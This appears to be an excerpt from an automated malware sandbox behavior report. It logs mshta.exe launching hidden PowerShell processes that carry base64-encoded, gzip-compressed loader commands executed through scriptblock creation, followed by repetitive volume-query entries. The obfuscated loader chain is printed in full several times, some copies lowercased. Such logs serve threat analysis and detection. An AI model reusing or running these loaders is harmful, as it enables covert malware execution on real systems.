          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -e aqbmacgawwbjag4adabqahqacgbdadoaogbtagkaegblacaalqblaheaiaa0ackaewakagiapqanahaabwb3aguacgbzaggazqbsagwalgblahgazqanah0azqbsahmazqb7acqayga9acqazqbuahyaogb3agkabgbkagkacgaraccaxabzahkacwb3ag8adwa2adqaxabxagkabgbkag8adwbzafaabwb3aguacgbtaggazqbsagwaxab2adealgawafwacabvahcazqbyahmaaablagwabaauaguaeablaccafqa7acqacwa9ae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmauwb0ageacgb0aekabgbmag8aowakahmalgbgagkabablae4ayqbtaguapqakagiaowakahmalgbbahiazwb1ag0azqbuahqacwa9accalqbuag8acaagac0adwagaggaaqbkagqazqbuacaalqbjacaajgaoafsacwbjahiaaqbwahqaygbsag8aywbraf0aoga6agmacgblageadablacgakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbtahqacgblageabqbsaguayqbkaguacgaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0akaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgalabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgakaaoaccajwbiadqacwbjaeeatqbkahuawabhafkaqwbbadcavgbxacsamaavagiauwbcaeqakwavageavaaraeqamqbzafyaeqbiafkayqbzahuazabsaesarqbpafyaygb1adiauqbcacsaqwbrafkasgblafeacaboaeyacabhadialwbzaeoavwb0ahyacwbeaguarqawae8adgavagyacgbpae8aegblae8aqqbpagoadqbwagwazwbmadcabqbkag0azaavaguayqbiag0avgayahmawqawadkauqbiagkadgb4agmacqbeadgakwbqaemasabrag4aoqa5ag4atwbcaekamabvaheakwbxafyawgblahkayqbyacsadqbgae4ayqbwaeoavwb2agkaagbaaeqacqaxafcavabsaduaagbhadgangbnagoazqa1adaaawbkaeiayqa3aguayqbwae4aqgbfahaavabfag4amqbuagwaswanaccakwanaccauwbhahiadgb5ahqaagbfae8auwbraewaewaxah0aega3adkazgbfaeuaoabvafaacabmafiawabwagmaewaxaccajwaraccajwb9adqazaa4ahgaeqbzageamgboahyawgbbag8azqb5agoamga1agqanabaadkanwbeadaacqblaesadqbhaeiavwbhacsadqayagiacqbzac8amgbxahyauabladgaywawageacwaxafiavab7adeafqbxadaacqbtaeyavab4aecavgboadeanqbhagmadqbeadcaegbjahiabwbpag0atwb0afiatablae0abwbyag8aagblag0aywbiadeavwbhagmawqbwafgacabbaguavwbmahmababeahsamgb9aeuaewayah0aoqaxae0avgbyahyasga0ag0awqbtaekazabsaewatabpadaaawbqae8aeabgae4aewayah0avwbfac8anaanaccakwanaccauga3ahkalwbzafmaawbxafyacabxafoadabmadgaygbeadcalwbvaduadgbsafoamqarahmawqawaeuaagbvahuabgbhagcaaqbsadganqbaaewaawbsag4abwbrahiawabsahcanwbeae4aeqbrafiawgb6adaasabkaeyauqb1ae4azwbyahuacwbnagqacwb1afgaugbdahyargbhadgaygblahkabga4ahgabwavafgasqbwagsarab1ahyavqbyageavqb5afcauqa2ag8adabfaewamabnahcawaanaccakwanaccaoqb6afmajwanacsajwanadqazga2ageaawbaadiazqarag8acqbiaeuasaa0agqadgb7adiafqawaeyaqqbmagkazgbfahiadabgafeawgbuagwalwbpahuatqblafyadwbvahyababtadiauqa4aeiawabyagmaoqbuag0acqanaccakwanaccabaarafyajwanacsajwanafkaqgbyaeqacab5aewaqgbvacsamgbnaemamqbkaeoabqb1agkaegb4acsauqbwagsacgbzaewaygavafgavgbyafyauqbsaecacqbuahmarabbagiaywblahiauabiadkavwbmahgaygb5afuanwbmae4aqqbdahiaewaxah0atga0aemawgbaadaasgbnadaadab6aecatwbxaeyazqbrafyasabzahqargbhafqaqgbtaekawgbhahaaugbeahiazwbyacsayqbtag0aoabrahyamabrafka
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siamjuxgyca7vw+0/bsbd+/at+d1yvybyayudrkeivbu2qb+cqyjkqpnfpa2/sjwtvsdee0ov/froozeoaijuplgl7mjmd/eabmv2sy09qhivxcqd8+pchkn99nobi0uq+wvzkyax+ufnavjwvijzdq1wtr5jg86mje50kjba7eavnbepten1nlk'+'sarvytjeoskl{1}z79fee8oppfrxpc{1'+'}4d8xysa2nvzaoeyj25d4z97d0qekugbwa+u2bqs/2qvpk8c0as1rt{1}w0qsftxgvn15acud7zcroimotrlemoxojkmcb1wgcypxpaewlsld{2}e{2}91mvrvj4mysidrllo0kjoxfn{2}we/4'+'r7y/yskqvpwztl8bd7/u5vlz1+sy0ejuunggir85zlklnokrxrw7dnyqrzz0hjfqungrusgdsuxrcvfa8bkyn8xo/xipkduvurauywq6otel0mwx'+'9zs'+'4f6akz2e+oqbeh4dv{2}0falifertfqznl/iumevwovlm2q8bxrc9tmq'+'l+v'+'ybxdpylbu+2mc1djmuizx+qvkrylb/xvrvqlgqnsdabcerph9wfxbyu7lnacr{1}n4czz0jg0tzgoqfeqvhstfgtbsizgprdrgx+amm8qv0kycbcq8epgvfa7jq{2}40lxwlpkkqr6emwwvinl6c2d2edpubuyqckdbzygipqw'+'kbimk8{1}tyfqfloqipnsnpwlb6a8{2}nr6y4bdpilxuupztfqmvbs6h66k6zzoj6o'+'bwfubn+lzjzy20epyjzexbugodsxrgpyiyrkssd6{2}nr69kgof59'+'fq8bmwzja5zuir6winfw{2}arkap4clfsks0q{1}wjesgurwkvomb1ax8stimiu'+'d4qtvuflkwi7uepcckcdoqrbdxkvzgdfeqn2rgopt/+hby2qtuwinja+mvmtwznoksf7s9cxntvt'+'snmcnqymrgeqr4zgfu7lf2bux7anxtvsivkk{1}zo5/sqtv7gz+dvygzqp/9os6y9b6lzuenfbbrs+ibokn96whpp/ej4fuqchc466w+6gzokbvcd{1}'+'lvjtja{2}bqm5ggvzcipwb2j6ozxje9mzadsem1rftnlqwin{2}qdkxpv64{1}zurke8cagtwsdig7uzmamvft8zoqmltllxyf2xfdxrtuds47raiwlmu/d/untmixdhzedluiw9+vo9qp6ws87xmq1ym4c2o0lokbijo9hlyuftqwe9y0rdlz8fiwnnvpgi+'+'txkzko{2}i1rmg{2}zani+vmkegofxol7cotue1e{2}0dxurwry16qxodbpr9ck9n24audzholgamccueeeczjqfkpwpx9maxlocwsdtmt6gdj{2}ztfom9i+hny5grhef0dl02zk'+'m6qtfqb2tj9sbgoa'+'4dqwbrult875pvec+98efe5ofmbpib0bthvtdk{1}lnyxxjv5to89sbvjfe+cgxszedrrwndwp0evgxg9jy1gvz'+'kggcwtm//fhawpfdj8x4qxc4oeldziaxuoaltg{1}xpjux7z6nukptzn9fkiqmdpoldnsc7ogx7smuavue+twui8imnuxmlr020puh'+'qf2xmxrlr0dtcbeskgn{1}5yzegqjl5l{1}dnkezmhdmi0uw99/m5quttrnwlv0kw+bbpsvsg0m6udttt+mfdwybjewtxn4cdw5eqswbarirbbjci{1}p2fmd8xg9keiyfafefu8/kw0'+'hsbczskruljgq/fdqfs0vfoy{2}/k{1}xyk{2}bcp//x1hlc+8xuu+{2}klnfwvf{2'+'}+vvcke/y++48xfsdoql1mzpdqea2gpfmebdgldatciv/km/l8lfz68a7lesm/y1pue6claaa{0}')-f'=','3','h')))),[system.io.compression.compressionmode]::decompress))).readtoend()))
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -e aqbmacgawwbjag4adabqahqacgbdadoaogbtagkaegblacaalqblaheaiaa0ackaewakagiapqanahaabwb3aguacgbzaggazqbsagwalgblahgazqanah0azqbsahmazqb7acqayga9acqazqbuahyaogb3agkabgbkagkacgaraccaxabzahkacwb3ag8adwa2adqaxabxagkabgbkag8adwbzafaabwb3aguacgbtaggazqbsagwaxab2adealgawafwacabvahcazqbyahmaaablagwabaauaguaeablaccafqa7acqacwa9ae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmauwb0ageacgb0aekabgbmag8aowakahmalgbgagkabablae4ayqbtaguapqakagiaowakahmalgbbahiazwb1ag0azqbuahqacwa9accalqbuag8acaagac0adwagaggaaqbkagqazqbuacaalqbjacaajgaoafsacwbjahiaaqbwahqaygbsag8aywbraf0aoga6agmacgblageadablacgakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbtahqacgblageabqbsaguayqbkaguacgaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0akaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgalabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgakaaoaccajwbiadqacwbjaeeatqbkahuawabhafkaqwbbadcavgbxacsamaavagiauwbcaeqakwavageavaaraeqamqbzafyaeqbiafkayqbzahuazabsaesarqbpafyaygb1adiauqbcacsaqwbrafkasgblafeacaboaeyacabhadialwbzaeoavwb0ahyacwbeaguarqawae8adgavagyacgbpae8aegblae8aqqbpagoadqbwagwazwbmadcabqbkag0azaavaguayqbiag0avgayahmawqawadkauqbiagkadgb4agmacqbeadgakwbqaemasabrag4aoqa5ag4atwbcaekamabvaheakwbxafyawgblahkayqbyacsadqbgae4ayqbwaeoavwb2agkaagbaaeqacqaxafcavabsaduaagbhadgangbnagoazqa1adaaawbkaeiayqa3aguayqbwae4aqgbfahaavabfag4amqbuagwaswanaccakwanaccauwbhahiadgb5ahqaagbfae8auwbraewaewaxah0aega3adkazgbfaeuaoabvafaacabmafiawabwagmaewaxaccajwaraccajwb9adqazaa4ahgaeqbzageamgboahyawgbbag8azqb5agoamga1agqanabaadkanwbeadaacqblaesadqbhaeiavwbhacsadqayagiacqbzac8amgbxahyauabladgaywawageacwaxafiavab7adeafqbxadaacqbtaeyavab4aecavgboadeanqbhagmadqbeadcaegbjahiabwbpag0atwb0afiatablae0abwbyag8aagblag0aywbiadeavwbhagmawqbwafgacabbaguavwbmahmababeahsamgb9aeuaewayah0aoqaxae0avgbyahyasga0ag0awqbtaekazabsaewatabpadaaawbqae8aeabgae4aewayah0avwbfac8anaanaccakwanaccauga3ahkalwbzafmaawbxafyacabxafoadabmadgaygbeadcalwbvaduadgbsafoamqarahmawqawaeuaagbvahuabgbhagcaaqbsadganqbaaewaawbsag4abwbrahiawabsahcanwbeae4aeqbrafiawgb6adaasabkaeyauqb1ae4azwbyahuacwbnagqacwb1afgaugbdahyargbhadgaygblahkabga4ahgabwavafgasqbwagsarab1ahyavqbyageavqb5afcauqa2ag8adabfaewamabnahcawaanaccakwanaccaoqb6afmajwanacsajwanadqazga2ageaawbaadiazqarag8acqbiaeuasaa0agqadgb7adiafqawaeyaqqbmagkazgbfahiadabgafeawgbuagwalwbpahuatqblafyadwbvahyababtadiauqa4aeiawabyagmaoqbuag0acqanaccakwanaccabaarafyajwanacsajwanafkaqgbyaeqacab5aewaqgbvacsamgbnaemamqbkaeoabqb1agkaegb4acsauqbwagsacgbzaewaygavafgavgbyafyauqbsaecacqbuahmarabbagiaywblahiauabiadkavwbmahgaygb5afuanwbmae4aqqbdahiaewaxah0atga0aemawgbaadaasgbnadaadab6aecatwbxaeyazqbrafyasabzahqargbhafqaqgbtaekawgbhahaaugbeahiazwbyacsayqbtag0aoabrahyamabrafkaJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siamjuxgyca7vw+0/bsbd+/at+d1yvybyayudrkeivbu2qb+cqyjkqpnfpa2/sjwtvsdee0ov/froozeoaijuplgl7mjmd/eabmv2sy09qhivxcqd8+pchkn99nobi0uq+wvzkyax+ufnavjwvijzdq1wtr5jg86mje50kjba7eavnbepten1nlk'+'sarvytjeoskl{1}z79fee8oppfrxpc{1'+'}4d8xysa2nvzaoeyj25d4z97d0qekugbwa+u2bqs/2qvpk8c0as1rt{1}w0qsftxgvn15acud7zcroimotrlemoxojkmcb1wgcypxpaewlsld{2}e{2}91mvrvj4mysidrllo0kjoxfn{2}we/4'+'r7y/yskqvpwztl8bd7/u5vlz1+sy0ejuunggir85zlklnokrxrw7dnyqrzz0hjfqungrusgdsuxrcvfa8bkyn8xo/xipkduvurauywq6otel0mwx'+'9zs'+'4f6akz2e+oqbeh4dv{2}0falifertfqznl/iumevwovlm2q8bxrc9tmq'+'l+v'+'ybxdpylbu+2mc1djmuizx+qvkrylb/xvrvqlgqnsdabcerph9wfxbyu7lnacr{1}n4czz0jg0tzgoqfeqvhstfgtbsizgprdrgx+amm8qv0kycbcq8epgvfa7jq{2}40lxwlpkkqr6emwwvinl6c2d2edpubuyqckdbzygipqw'+'kbimk8{1}tyfqfloqipnsnpwlb6a8{2}nr6y4bdpilxuupztfqmvbs6h66k6zzoj6o'+'bwfubn+lzjzy20epyjzexbugodsxrgpyiyrkssd6{2}nr69kgof59'+'fq8bmwzja5zuir6winfw{2}arkap4clfsks0q{1}wjesgurwkvomb1ax8stimiu'+'d4qtvuflkwi7uepcckcdoqrbdxkvzgdfeqn2rgopt/+hby2qtuwinja+mvmtwznoksf7s9cxntvt'+'snmcnqymrgeqr4zgfu7lf2bux7anxtvsivkk{1}zo5/sqtv7gz+dvygzqp/9os6y9b6lzuenfbbrs+ibokn96whpp/ej4fuqchc466w+6gzokbvcd{1}'+'lvjtja{2}bqm5ggvzcipwb2j6ozxje9mzadsem1rftnlqwin{2}qdkxpv64{1}zurke8cagtwsdig7uzmamvft8zoqmltllxyf2xfdxrtuds47raiwlmu/d/untmixdhzedluiw9+vo9qp6ws87xmq1ym4c2o0lokbijo9hlyuftqwe9y0rdlz8fiwnnvpgi+'+'txkzko{2}i1rmg{2}zani+vmkegofxol7cotue1e{2}0dxurwry16qxodbpr9ck9n24audzholgamccueeeczjqfkpwpx9maxlocwsdtmt6gdj{2}ztfom9i+hny5grhef0dl02zk'+'m6qtfqb2tj9sbgoa'+'4dqwbrult875pvec+98efe5ofmbpib0bthvtdk{1}lnyxxjv5to89sbvjfe+cgxszedrrwndwp0evgxg9jy1gvz'+'kggcwtm//fhawpfdj8x4qxc4oeldziaxuoaltg{1}xpjux7z6nukptzn9fkiqmdpoldnsc7ogx7smuavue+twui8imnuxmlr020puh'+'qf2xmxrlr0dtcbeskgn{1}5yzegqjl5l{1}dnkezmhdmi0uw99/m5quttrnwlv0kw+bbpsvsg0m6udttt+mfdwybjewtxn4cdw5eqswbarirbbjci{1}p2fmd8xg9keiyfafefu8/kw0'+'hsbczskruljgq/fdqfs0vfoy{2}/k{1}xyk{2}bcp//x1hlc+8xuu+{2}klnfwvf{2'+'}+vvcke/y++48xfsdoql1mzpdqea2gpfmebdgldatciv/km/l8lfz68a7lesm/y1pue6claaa{0}')-f'=','3','h')))),[system.io.compression.compressionmode]::decompress))).readtoend()))Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
